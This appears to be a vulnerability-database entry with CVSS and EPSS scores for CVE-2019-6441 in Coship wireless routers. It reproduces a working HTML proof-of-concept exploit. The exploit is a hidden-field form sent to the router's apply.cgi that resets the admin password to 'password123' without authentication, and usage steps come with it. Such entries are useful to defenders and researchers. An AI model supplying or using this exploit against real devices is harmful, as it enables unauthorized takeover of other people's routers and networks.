10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.209 Low
EPSS
Percentile
96.4%
<!--
# Exploit Title: Coship Wireless Router β Unauthenticated Admin Password Reset
# Date: 15.01.2019
# Exploit Author: Adithyan AK
# Vendor Homepage: http://en.coship.com/
# Category: Hardware (Wifi Router)
# Affected Versions : Coship RT3052 - 4.0.0.48, Coship RT3050 - 4.0.0.40, Coship WM3300 - 5.0.0.54, Coship WM3300 - 5.0.0.55, Coship RT7620 - 10.0.0.49.
# Tested on: MacOS Mojave v.10.14
# CVE: CVE-2019-6441
# Change the X.X.X.X in poc to Router Gateway address and save the below code as Exploit.html
# Open Exploit.html with your Browser
# Click on βSubmit requestβ
# Password of the admin will now be changed as "password123"
# PoC :
-->
<html>
<!-- Change the X.X.X.X with the router's IP address -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://X.X.X.X/apply.cgi" method="POST">
<input type="hidden" name="page" value="regx/management/accounts.asp" />
<input type="hidden" name="http_username" value="admin" />
<input type="hidden" name="http_passwd" value="password123" />
<input type="hidden" name="usr_confirm_password" value="password123" />
<input type="hidden" name="action" value="Submit" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.209 Low
EPSS
Percentile
96.4%